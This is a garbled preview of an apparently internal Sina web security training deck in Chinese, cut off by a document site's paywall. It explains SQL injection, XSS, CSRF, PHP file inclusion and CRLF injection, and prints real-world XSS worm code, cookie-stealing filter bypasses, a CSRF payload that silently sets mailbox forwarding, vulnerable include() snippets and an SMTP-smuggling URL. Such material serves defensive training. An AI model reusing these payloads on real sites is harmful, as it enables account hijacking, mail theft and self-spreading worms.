新浪web安全培训

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

内容简介1.知己知彼,百战不殆2.解析黑客手中的利器3.捍卫代码城堡4.剑走偏锋5.惊栗后的深思6.双剑合壁新浪WEB安全培训ver.2互联网攻击趋势(统计来自computer.org)脚本安全编程重要性脚本安全编程重要性1.知己知彼,百战不殆传统攻击流程WEB攻击流程WEB攻击流程2.解析黑客手中的利器黑客攻击技术曝光一、脚本黑客的瑞士军刀--SQL注入攻击1.猜解出数据库中的敏感信息2.如果连接权限高的话会得到文件操作权限(load_file,intooutfile)3.根据数据库特性执行系统命令SQL注入利用的是参数传递的时候过滤不严时用参数组合成正确的SQL语句来执行操作的技术。简单的理解为:涉及进入SQL语句操作的变量没有过滤输入与转义输出实例-夜猫软件下载系统(攻击与修复)=1黑客攻击技术曝光黑客攻击技术曝光二、暗夜中舞动的精灵--XSS跨站脚本攻击1.进行会话劫持2.CSRF3.XSSWORM4.社会工程攻击、钓鱼、拒绝服务5.涂鸦页面XSS又叫CSS(CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码(恶意JS代码),当用户浏览该页之时,嵌入其中Web里面的html代码(恶意JS代码)会被执行,从而达到恶意用户的特殊目的。输入一些数据需要在页面中显示出来,但是没有对这段数据做过滤输入或者转义输出。黑客攻击技术曝光xss特点继承浏览器权限社会工程,被动攻击影响广泛(只要浏览器支持JavaScript)隐蔽,难以察觉XSS可能出现在哪?1.HTML标签外部2.HTML标签内部(属性、事件)3.输入到javascript代码黑客攻击技术曝光黑客攻击技术曝光WEB安全新挑战-XSSWORM两段真实的XSSWROM统计数据百度XSS蠕虫攻击统计黑客攻击技术曝光新浪博客v5.0蠕虫varblogtitle=IOwNedyouRBloGvarblogbody=You\'rEmYfOOd.brahref=\蠕虫传播主体,不要构造这里/avarxmlhttp=newActiveXObject(Msxml2.XMLHTTP.3.0);xmlhttp.open(GET,/admin/article/article_add.php,false);xmlhttp.send();varxss=xmlhttp.responseText;token=xss.indexOf(vtoken);if(token0){vtoken=xss.substr(token+15,32);xmlhttp.open('post','/admin/article/article_post.php',false);xmlhttp.setRequestHeader('Content-Type','application/x-);xmlhttp.send('album=&blog_id=&is_album=0&stag=&sno=&channel_id=&url=&channel=&newsid=&book_worksid=&vtoken='+vtoken+'&is_media=0&blog_title='+blogtitle+'&blog_body='+blogbody+'&tag=&blog_class=0&x_cms_flag=1&sina_sort_id=117&is2bbs=1&join_circle=1');varsuss=xmlhttp.responseText;send=suss.indexOf(06001);if(send0){//alert(感染成功:));document.location=}else{alert(感染失败:();}}黑客攻击技术曝光新浪空间好友纸条群发蠕虫'---获取cookie中的uid---cookie=unescape(request(cookie))cflag=Instr(cookie,nick=)dflag=Instr(cookie,);)…………………省略……………………..'---遍历好友数---fori=1to500'---得到此uid的好友---url==&uid&&page=&i&&pagesize=1xml.openGET,url,Falsexml.sendhtmlcon=b2bstr(xml.responsebody)'---提取好友uid---aflag=Instr(htmlcon,{record:[{uid:)bflag=InStr(htmlcon,,ftype)Ifaflag0Andbflag0Thenokflag=Replace(Replace(mid(htmlcon,aflag,bflag),{record:[{uid:,),,)Else'---超过最大好友数就中断---exitforEndIf'---playload---Response.Writeiframesrc=message.asp?uid=&okflag&width=700height=30“frameborder=noborder=0marginwidth=0marginheight=0scrolling=no“allowtransparency=yes“next黑客攻击技术曝光永无止境的斗争--XSS过滤&突破BaiduXSS过滤绕过a{evilmask:ex/*exp/**/ression*/pression……}SinaXSS过滤绕过(input)=+style=xss:expression(alert(document.cookie));“Sourecode:inputtype=hiddenname=namevalue=style=xss:expression(alert(document.cookie));黑客攻击技术曝光新浪圈子--Html标签内部进攻黑客攻击技术曝光仔细分析该处也进行了敏感字符的过滤,比如javascript,TAB字元,“)等,但是经过测试发现这种过滤非常容易绕过,例如:JaVaScrIpT:eval(unescape('xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/g33k/bbs/topic/tid%3D13037271%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Balert%28xmlhttp.responseText%29%3B'));黑客攻击技术曝光被污染的页面代码:DIVclass=list_insideIMGstyle=WIDTH:auto;star:autosrc=JaVaScrIpT:eval(unescape('xss%3D%22reply_floor--------------省略部分代码--------------------alert%28xmlhttp.responseText%29%3B'));aaa/DIV/TD/TR/TBODY黑客攻击技术曝光新浪VIP邮箱CSRF攻击XMLID=xssIB<IMGSRC=javas!----cript:eval(unescape('xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/classic/setforward.php%3Foptype%3D1%26is_open%3D1%26Forward_To%3Dmengzhuo@staff.sina.com.cn%26Forward_Save%3Don%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Bvar%20a%3D%28xmlhttp.responseText%29%3Bdocument.write%28%22I%20Miss%20You%20%20from%20FengGou%20%3A%29%22%29%3B'));>/B/I/XMLSPANDATASRC=#xssDATAFLD=BDATAFORMATAS=HTML/SPAN黑客攻击技术曝光代码分析javas!----cript:eval(unescape('xmlhttp=newActiveXObject(Msxml2.XMLHTTP.3.0);xmlhttp.open(GET,/classic/setforward.php?optype=1&is_open=1&Forward_To=mengzhuo@staff.sina.com.cn&Forward_Save=on,false);xmlhttp.send();vara=(xmlhttp.responseText);document.write(IMissYoufromFengGou:));'));黑客攻击技术曝光黑客攻击技术曝光XSS重组攻击先进后执行/*/script*/(‘hi’);/**/alert/*script/*黑客攻击技术曝光三、千里之堤,毁于蚁穴--PHP文件包含漏洞服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到攻击的目的。黑客攻击技术曝光常见的攻击手法1.包含本地任意文件(读取、执行)2.包含远程任意文件(执行)3.直接执行系统命令(php://input)本地包含&远程包含黑客攻击技术曝光文件包含$file=$_GET[file];include($file);include('/config/'.$file);路径包含$path=$_GET[path];include($path.'/config.php');黑客攻击技术曝光黑客攻击技术曝光黑客攻击技术曝光四、一切尽在不言中--目录遍历1.查看当前以及其他目录结构与其文件2.危害目的由不正当使用的函数决定3.危害升级,CRLF注入。VulnCode:$fp=fopen($url,'r');fpassthru($fp);黑客攻击技术曝光四又1/2、文件名操作函数引发的血案—CRLFPHP的fopen(),file()及其它函数存在一个缺陷,即用户随意地添加额外HTTP报头信息到HTTP请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制,进行非法访问。在某些情况下,这个缺陷甚至可以打开任意的网络连接,在代理端执行PHP脚本和打开邮件转发。黑客攻击技术曝光doc.php?url=http%3A%2F%2Fstaff.sina.com.cn%3A25%2F+HTTP/1.0%0D%0AHELO+staff.sina.com.cn%0D%0AMAIL+FROM%3A%3Cmengzhuo@staff.sina.com.cn%3E%0D%0ARCPT+TO%3A%3Cxxx@staff.sina.com.cn%3E%0D%0ADATA%0D%0ACRLF+is+here%0D%0A.%0D%0AQUIT%0D%0A%0D%0Aurl=:mengzhuo@

1 / 86
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功